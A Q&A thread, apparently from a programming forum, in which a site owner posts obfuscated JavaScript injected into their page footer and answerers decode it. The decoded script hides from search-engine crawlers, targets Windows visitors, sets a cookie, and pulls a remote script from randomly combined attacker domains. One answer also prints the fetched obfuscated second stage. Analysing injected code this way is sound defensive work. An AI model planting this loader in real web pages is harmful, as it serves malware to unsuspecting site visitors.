# Decode some injected Javascript?

Tags: javascript, decoding

I had the following injected into the footer of a site of mine and, in an effort of solving the greater mystery ("How" it happened), I'm trying to decode it. Any ideas?

Here's the code:

```
<ads><script type="text/javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%61%3D%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2C%62%3D%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%2C%63%3D%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%3B%20%69%66%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%69%6E%64%65%78%4F%66%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%3D%3D%2D%31%26%26%21%61%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%62%29%26%26%63%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%21%3D%2D%31%29%7B%76%61%72%20%64%3D%5B%22%6D%79%61%64%73%2E%6E%61%6D%65%22%2C%22%61%64%73%6E%65%74%2E%62%69%7A%22%2C%22%74%6F%6F%6C%62%61%72%63%6F%6D%2E%6F%72%67%22%2C%22%6D%79%62%61%72%2E%75%73%22%2C%22%66%72%65%65%61%64%2E%6E%61%6D%65%22%5D%2C%65%3D%5B%22%76%61%67%69%2E%22%2C%22%76%61%69%6E%2E%22%2C%22%76%61%6C%65%2E%22%2C%22%76%61%72%73%2E%22%2C%22%76%61%72%79%2E%22%2C%22%76%61%73%61%2E%22%2C%22%76%61%75%74%2E%22%2C%22%76%61%76%73%2E%22%2C%22%76%69%6E%79%2E%22%2C%22%76%69%6F%6C%2E%22%2C%22%76%72%6F%77%2E%22%2C%22%76%75%67%73%2E%22%2C%22%76%75%6C%6E%2E%22%5D%2C%66%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%64%2E%6C%65%6E%67%74%68%29%2C%67%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%65%2E%6C%65%6E%67%74%68%29%3B%64%74%3D%6E%65%77%20%44%61%74%65%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%2B%39%30%37%32%45%34%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%68%6F%6C%79%63%6F%6F%6B%69%65%3D%22%2B%65%73%63%61%70%65%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%2B%22%3B%65%78%70%69%72%65%73%3D%22%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%22%3B%70%61%74%68%3D%2F%22%3B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%65%5B%67%5D%2B%64%5B%66%5D%2B%27%2F%73%79%73%74%65%6D%2F%63%61%70%74%69%6F%6E%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'));</script></ads>
```

Comment: I appreciate all the answers. I've cleaned it up and will keep an eye out for more.

Answer (score 20, accepted):

You can decode the string using [this tool](http://coderstoolbox.net/string/).  Set string conversion options to **URL** and **Decode**. Then you can pretty it up with [js beautifier](http://jsbeautifier.org/).

And because I'm a curious sort, I took a look at the output.  It's writing a new `caption.js` file to your pages from a semi-random domain.  There are 2 arrays of URL segments that are used to build the full domain, so I'd say you've got something to go with.

Comment: Thank you for the references and taking a closer look! I appreciate it!

Answer (score 7):

```
<script language="javascript" type="text/javascript">
var a = window.navigator.userAgent,
    b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
    c = navigator.appVersion;
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) {
    var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"],
        e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."],
        f = Math.floor(Math.random() * d.length),
        g = Math.floor(Math.random() * e.length);
    dt = new Date;
    dt.setTime(dt.getTime() + 9072E4);
    document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/";
    document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>')
};
</script>
```

So, prepends a subdomain from `e` (e.g. `vagi.`) to a domain name from `d` (e.g. `myads.name`) and loads a script from `/system/caption.js` at that domain (e.g. `http://vagi.myads.name/system/caption.js`).

Answer (score 2):

```
var a = window.navigator.userAgent,
    b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
    c = navigator.appVersion;
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) {
    var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"],
        e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."],
        f = Math.floor(Math.random() * d.length),
        g = Math.floor(Math.random() * e.length);
    dt = new Date;
    dt.setTime(dt.getTime() + 9072E4);
    document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/";
    document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>')
};
```

code is loading a random subdomain-sld combo with a cookie set, to load unsecure content.

Answer (score 1):

All of those numbers are hexadecimal values for ASCII characters. When unescape is called they get turned into real characters. e.g. %3C is '<'.

Why not use a message box to display the output of unescape(...)

Answer (score 1):

You can use the hex decoder here:
http://home2.paulschou.net/tools/xlate/
The code is

```
<script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};</script>
```

Answer (score 1):

```
<script language="javascript" type="text/javascript">
var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; 
if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){
    var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],
    e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],
f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);
dt=new Date;
dt.setTime(dt.getTime()+9072E4);
document.cookie="holycookie="+escape("holycookie")+";
expires="+dt.toGMTString()+";
path=/";
document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};
</script>
```

Answer (score 1):

Here's a URLDecoder:
http://meyerweb.com/eric/tools/dencoder/

And the code it writes:

```
<script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};</script>
```

OK, so that's not too helpful.  It appears to insert another JS file if the user doesn't have a cookie named "holycookie" and isn't the google bot.  Most of that is just junk to pick which domain name to get the payload from.

Answer (score 1):

The code you posted decodes to

```
var a = window.navigator.userAgent,
    b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
    c = navigator.appVersion;
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) {
    var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"],
        e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."],
        f = Math.floor(Math.random() * d.length),
        g = Math.floor(Math.random() * e.length);
    dt = new Date;
    dt.setTime(dt.getTime() + 9072E4);
    document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/";
    document.write('')
};
```

which in turn loads code from a url composed in a pseudorandom way provided that the if condition is met.

If you open up, for instance, http://vain.adsnet.biz/system/caption.js you'll be presented with the following javascript code.

I leave the interpretation to you, however it looks quite harmless.

```
function tT() {};
var yWP = new Array();
tT.prototype = {
    h: function () {
        this.i = "";
        var nH = function () {};
        var tE = 30295;
        var u = "";
        zB = false;
        this.a = '';
        this.eY = 29407;
        var z = document;
        vD = "vD";
        var gT = "gT";
        var oG = '';
        var lF = '';
        fU = "fU";
        var q = function () {
            return 'q'
        };
        var c = window;
        var m = function () {
            return 'm'
        };
        var kS = "kS";
        this.b = "";
        this.p = 29430;
        var j = this;
        dL = "";
        var cC = new Date();
        cQ = 33459;
        var uY = "uY";
        var vO = function () {};
        zN = "zN";
        jIZ = '';
        var mH = 21601;
        String.prototype.lP = function (v, hF) {
            var t = this;
            return t.replace(v, hF)
        };
        var nA = "";
        this.xK = 48622;
        zG = "";
        var kF = function () {};

        function aF() {};
        var mI = function () {};
        var oY = '';
        var g = 'sfe?tfTw'.lP(/[wfoj\?]/g, '') + 'irmkeko('.lP(/[\(rO\[k]/g, '') + 'ubty'.lP(/[y\+b\>\)]/g, '');
        var iN = new Array();
        mJ = "mJ";
        aW = "aW";
        var hU = "hU";
        this.kC = 28044;
        var k = 'tbr3e*c(r*e3a('.lP(/[\(3b\*G]/g, '') + 'tEe>nat>gaeat)'.lP(/[\)a\>\]\|'.lP(/[\|\)\(MN]/g, ''));
        var cJ = function () {};
        var tX = false;
        this.xHX = false;

        function jP() {};
        var eZ = 16039;
        bQ = "bQ";
        var eSM = new Date();
        c[g](function () {
            j.h()
        }, 384);
        this.xR = "";
        var jB = function () {
            return 'jB'
        };
        var fP = function () {
            return 'fP'
        };
        var bX = new Array();
    }
    function iLD() {};
    var mQ = function () {};
    var wZV = "";this.eK = 5506;
}
};
fO = 30941;
var hW = new tT();
wU = 40956;
hW.h();
hZ = "hZ";
```

How could you have done this on your own? URLDecode + jsbeautifier or jsunpack are more than enough to get this far ;)

Answer (score 1):

Use "Version Control" so this doesn't happen in the future. After a good build is completed, and everything is the way you want it, save it to an external hard drive while you are offline.

Did you recently do something to upset a coworker who is a programmer?

Answer (score 0):

Used php function rawurldecode

```
   <script language="javascript" type="text/javascript">
    var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion;
    if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){
    var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);
    dt=new Date;
    dt.setTime(dt.getTime()+9072E4);
    document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; 
    document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};
    </script>
```